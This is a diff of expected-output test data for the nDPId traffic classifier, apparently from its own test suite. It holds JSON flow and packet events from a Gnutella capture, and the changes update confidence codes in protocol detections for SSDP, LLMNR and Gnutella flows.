+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40005,"flow_last_seen":40005,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":40005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":40185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":40185,"pkt":"AQBeAAD7CAAn5uVZCABFAABEaF8AAAERZEAKAAIP4AAA+xTpFOkAMJ6ZAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":40185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":40185,"pkt":"MzMAAAD7CAAn5uVZht1gBGNuADARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw\/soAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"MzMAAQADCAAn5uVZht1gAihOACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQAD9EsU6wAgDPv9UAAAAAEAAAAAAAAGcHVwcGV0AAABAAE="} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"AQBeAAD8CAAn5uVZCABFAAA0pMcAAAERJ+cKAAIP4AAA\/PRLFOsAIKvR\/VAAAAABAAAAAAAABnB1cHBldAAAAQAB"} -00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"MzMAAQADCAAn5uVZht1gAiZUACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQADxQMU6wAgtlmDHwAAAAEAAAAAAAAGcHVwcGV0AAAcAAE="} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"AQBeAAD8CAAn5uVZCABFAAA0pMgAAAERJ+YKAAIP4AAA\/MUDFOsAIFUwgx8AAAABAAAAAAAABnB1cHBldAAAHAAB"} -00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":40630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40630,"pkt":"MzMAAQADCAAn5uVZht1gAiZUACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQADxQMU6wAgtlmDHwAAAAEAAAAAAAAGcHVwcGV0AAAcAAE="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":40630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40630,"pkt":"MzMAAQADCAAn5uVZht1gAihOACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQAD9EsU6wAgDPv9UAAAAAEAAAAAAAAGcHVwcGV0AAABAAE="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":40630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":40630,"pkt":"AQBeAAD8CAAn5uVZCABFAAA0pMkAAAERJ+UKAAIP4AAA\/MUDFOsAIFUwgx8AAAABAAAAAAAABnB1cHBldAAAHAAB"} @@ -150,11 +150,11 @@ 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":63234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63234,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouwVAAIAG0BMKAAIPL5M0FcQXj3g4QcNPAGOcAlAQ+vBZpgAA"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":63250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63250,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAocAAEAGiwHa+gY7CgACDzEMxBQAZJYBrKXgdGAS\/\/+SMQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":63250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63250,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLR5AAIAG4G0KAAIP2voGO8QUMQyspeB0AGSWAlAQ+vCu\/QAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":63297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63297,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAooAAEAG5kR2qA9HCgACDw9bxBUAZZABIZ4f2mAS\/\/9gyQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":63297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63297,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTFBAAIAGHIIKAAIPdqgPR8QVD1shnh\/aAGWQAlAQ+vB9lQAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64030,"flow_last_seen":64030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64030,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":64030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64030,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZhAAIAG6a4KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64031,"flow_last_seen":64031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64031,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -170,10 +170,10 @@ 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":64213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64213,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoApQAAP8Gwb497q2ACgACD+EwxBoAAAAAK91tIlAUAAB6CAAA"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":64275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64275,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApUAAEAGjec93qBjCgACD0oyxBsAZ4QBK6ojSGAS\/\/\/MHQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":64276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64276,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocDVAAIAGoEoKAAIPPd6gY8QbSjIrqiNIAGeEAlAQ+vDo6QAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":64291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64291,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApcAAEAGH32vtZz0CgACDyA\/xB4AaH4BbaXa1mAS\/\/+UGgAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":64291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64291,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoyBJAAIAG2gQKAAIPr7Wc9MQeID9tpdrWAGh+AlAQ+vCw5gAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 